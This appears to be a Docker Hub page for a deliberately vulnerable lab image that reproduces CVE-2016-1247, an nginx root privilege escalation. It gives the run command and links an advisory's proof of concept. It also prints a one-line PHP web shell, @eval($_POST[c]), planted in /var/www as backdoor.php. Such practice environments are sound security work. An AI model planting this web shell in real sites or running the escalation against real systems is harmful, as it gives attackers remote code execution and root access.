Public Repository

Last pushed: 9 months ago
Short Description
cve-2016-1247 nginx local privelege elevate
Full Description
docker run -d -i --name CVE-2016-1247 -p 80:80 xk0n/cve-2016-1247

there is a backdoor.php in /var/www/

<?php
@eval($_POST[c]);
?>

use backdoor.php and this exploit to elevate to root privelege!

PoC from: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

You can also read https://github.com/xkon/vulBox/blob/master/CVE-2016-1247/readme.md to reproduct it .

Docker Pull Command
Owner
xk0n

Comments (1)
kevein
8 months ago

为什么复现不了漏洞 。。。